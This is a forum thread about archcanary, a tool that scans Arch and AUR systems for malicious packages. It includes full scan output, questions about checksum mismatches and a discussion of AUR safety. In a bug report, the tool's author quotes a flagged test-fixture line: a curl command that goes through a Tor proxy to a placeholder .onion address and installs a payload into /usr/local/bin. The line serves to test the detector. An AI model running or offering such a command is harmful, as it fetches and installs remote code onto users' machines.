take a day tops to learn and understand the basics, am can link and help but if you dont want to actually learn 0 time
am a day a big overestimate, more like an hour tops
EXCELLENT! The convenience of a GUI but in terminal. This is so much better.
Full oputput:
🐤 archcanary
----------------------------------------------
1) Full scan ?
2) Refresh + Full scan
3) Individual checks
4) Root checks [root]
5) Lynis hardening report [root]
6) Run Lynis audit [root]
7) Setup health check (--doctor)
8) Search packages
9) Manage allowlists
10) Edit config
11) Settings
12) About
0) Quit
Choice: 1
$ archcanary --full
(sudo may prompt for your password)
[sudo] password for wombat:
============================================================
Archcanary v0.1.31
Scanned: 2026-08-26 08:13
Lists loaded
package_list.txt infostealer + eBPF rootkit 1936 pkgs
+ CHAOS RAT 7 pkgs
+ Russian Spam 75 pkgs
+ Community Reports 93 pkgs
+ aur-audit black 103 pkgs
+ aur-audit red 241 pkgs
Packages checked: 2455
============================================================
--- [1] Currently installed foreign packages ---
Clean: no infected packages currently installed.
--- [2] Historical pacman logs ---
LOG_HIST_SEEN: discord-qt (installed on 2026-08-06T11:09:38-0500)
NOTE: log match(es) already flagged in a previous scan (package no
longer installed) — shown for the record, not re-counted as a warning:
- discord-qt (installed on 2026-08-06T11:09:38-0500)
--- [3] Systemd persistence check ---
Clean: no suspicious systemd units found.
--- [4] eBPF rootkit check ---
Clean: no eBPF rootkit traces detected.
--- [5] npm cache check ---
Clean: no malicious packages in npm cache.
--- [6] bun cache check ---
Clean: no malicious packages in bun cache.
--- [6b] yarn cache check ---
Clean: no malicious packages in yarn cache.
--- [6c] pnpm cache check ---
Clean: no malicious packages in pnpm store/cache.
--- [7] PKGBUILD/install file scan (obfuscation-aware) ---
Clean: no malicious commands found in 34 PKGBUILD/install file(s).
--- [8] Loaded eBPF programs/links (bpftool) ---
Loaded eBPF programs: 32
INFO: lsm eBPF programs present — expected (systemd sandboxing / AppArmor / SELinux).
Perf attachments (kprobe/tracepoint): none.
Net attachments (XDP/TC): none.
--- [9] ld.so.preload injection check ---
Clean: /etc/ld.so.preload not present or empty.
INFO: ld.so.conf.d entry present: /etc/ld.so.conf.d/lib32-glibc.conf (mtime 2026-08-10)
--- [10] XDG autostart + shell RC persistence check ---
INFO: autostart entry allowlisted (unresolved binary): /home/wombat/.config/autostart/it.mijorus.gearlever.desktop
Exec=gearlever
Clean: no suspicious autostart or shell RC entries found.
--- [11] Kernel module / DKMS audit ---
Clean: all loaded modules traceable to pacman packages or DKMS.
--- [12] Lynis hardening report ---
Skipped: lynis not installed (pacman -S lynis).
--- [13] Package file integrity ---
Verifying installed file checksums against pacman database...
(May take 30-60 seconds on large installs)
5 file(s) with unexpected checksum mismatch:
* info: eos-qogir-icons: /usr/share/icons/Qogir/icon-theme.cache (SHA256 checksum mismatch)
* info: eos-qogir-icons: /usr/share/icons/Qogir-Dark/icon-theme.cache (SHA256 checksum mismatch)
* info: filesystem: /usr/lib/os-release (SHA256 checksum mismatch)
* info: libvlc: /usr/lib/vlc/plugins/plugins.dat (SHA256 checksum mismatch)
* info: lsb-release: /etc/lsb-release (SHA256 checksum mismatch)
INFO: non-binary mismatches (config/cache/state) — likely a pacman hook or
the package's own tooling regenerating them by design. Reinstalling won't
fix this; only worth investigating if the change itself looks unexpected.
Packages: filesystem, libvlc, lsb-release, eos-qogir-icons
Check summary
───────────────────────────────────────────────────────
[1] Package list (2455 pkgs) ✅ clean
[2] pacman.log history ✅ clean
[3] Systemd persistence ✅ clean
[4] eBPF rootkit traces ✅ clean
[5] npm cache ✅ clean
[6] bun cache ✅ clean
[6b] yarn cache ✅ clean
[6c] pnpm cache ✅ clean
[7] PKGBUILD obfuscation scan ✅ clean
[8] eBPF programs (bpftool) ✅ clean
[9] ld.so.preload injection ✅ clean
[10] XDG autostart + shell RCs ✅ clean
[11] Kernel modules (DKMS) ✅ clean
[12] Lynis hardening ⚠ skipped (not installed)
[13] Package integrity ✅ clean
───────────────────────────────────────────────────────
============================================================
RESULT: CLEAN - No indicators found.
============================================================
Full scan: CLEAN
Press Enter to continue...
BUG report.
If you get something about archcanary test being flagged as warning… this is a warning about it own TOR test. I am working on a fix. It is telling, the test scan is working ![]()
WARNING: Tor/SOCKS-proxied fetch in /home/user/.cache/yay/archcanary/src/archcanary-0.1.31/tests/fake_pkgbuilds/pkg-multi-technique/.pkg-multi-technique.install:3
curl -x socks5h://127.0.0.1:9050 http://exampleplaceholderaddress.onion/payload -o /usr/local/bin/payload
Thanks for using the tool ![]()
wait what was I calling dumb? got a feeling I done soemthing wring here or I dumber than what I commented here/Sorry people
yup a little bit of learning to do but not much
Are those normal?
--- [13] Package file integrity ---
Verifying installed file checksums against pacman database...
(May take 30-60 seconds on large installs)
7 file(s) with unexpected checksum mismatch:
* info: eos-qogir-icons: /usr/share/icons/Qogir/icon-theme.cache (SHA256 checksum mismatch)
* info: eos-qogir-icons: /usr/share/icons/Qogir-Dark/icon-theme.cache (SHA256 checksum mismatch)
* info: filesystem: /usr/lib/os-release (SHA256 checksum mismatch)
* info: ghc-libs: /usr/lib/ghc-9.6.6/lib/package.conf.d/package.cache (SHA256 checksum mismatch)
* info: libvlc: /usr/lib/vlc/plugins/plugins.dat (SHA256 checksum mismatch)
* info: lsb-release: /etc/lsb-release (SHA256 checksum mismatch)
* info: whisper-toggle: /usr/bin/whisper-toggle (SHA256 checksum mismatch)
INFO: non-binary mismatches (config/cache/state) — likely a pacman hook or
the package's own tooling regenerating them by design. Reinstalling won't
fix this; only worth investigating if the change itself looks unexpected.
Packages: filesystem, libvlc, whisper-toggle, lsb-release, ghc-libs, eos-qogir-icons
* info: eos-qogir-icons: /usr/share/icons/Qogir/icon-theme.cache (SHA256 checksum mismatch) * info: eos-qogir-icons: /usr/share/icons/Qogir-Dark/icon-theme.cache (SHA256 checksum mismatch) * info: filesystem: /usr/lib/os-release (SHA256 checksum mismatch) * info: lsb-release: /etc/lsb-release (SHA256 checksum mismatch)
These look normal to me. lsb-release and os-release don’t match because EOS updates them. The theme caches get updated.
i know i still have many learning to do ,but still not going to use the aur and learn much more first when i can , hope i can…
ther is not much to learn and once learnt it like riding a bike and becomes second nature.
You can always open a thread here and ask if unsure about something, better to ask what may seem a dumb question (more than often they aren’t) than do a dumb acttion
Are those normal?
YES
see it as INFO. Just leave it as is.
Awesome job with the TUI! Much love!
Now… do I dare switch to the AUR version? I haven’t used AUR since Spring. I think there’s a bunch of packages I haven’t updated. ![]()
I think there’s a bunch of packages I haven’t updated
Please don’t run outdated packages on your system this can be even worse than a simple malware attack.
Either have faith in the tools you choose to use or switch tools.
Well I updated. Oldest was like 50 days old. Arccanary says all is good.
Oldest was like 50 days old
I would call that outdated on a rolling release. I don’t get much data at times and speed can be an issue but Iif I couldn’t update at least once a month max I would look at using something else.
Sadly some of the apps I need are only in the AUR, otherwise I wouldn’t even need to worry about any of it. I was just being hyper careful about using the AUR. (Before I had archcanary.) When you don’t fully understand what’s going on, don’t do a damn thing and play it safe. Didn’ t have time to look over every single detail of every package. Still don’t. And I still feel like the average computer user shouldn’t have to be a software engineer to be able to stay secure with software.
And I still feel like the average computer user shouldn’t have to be a software engineer to be able to stay secure with software.
The average Computer users are not the target audience of Arch. The Proficient Linux user is.
When you don’t fully understand what’s going on, don’t do a damn thing and play it safe.
Alternatively, what I did was buy a couple of cheap secondhand laptops (slightly more than $200 each) to test and learn on. Only successful tests using newly gained and proven knowledge make it to my “real” PC.
Call it “lifelong learning”.
And I still feel like the average computer user shouldn’t have to be a software engineer to be able to stay secure with software.
Agree with @thefrog. The average user runs Windows, Mac, Android.
OK I’ll rephrase, the average Linux user. ![]()


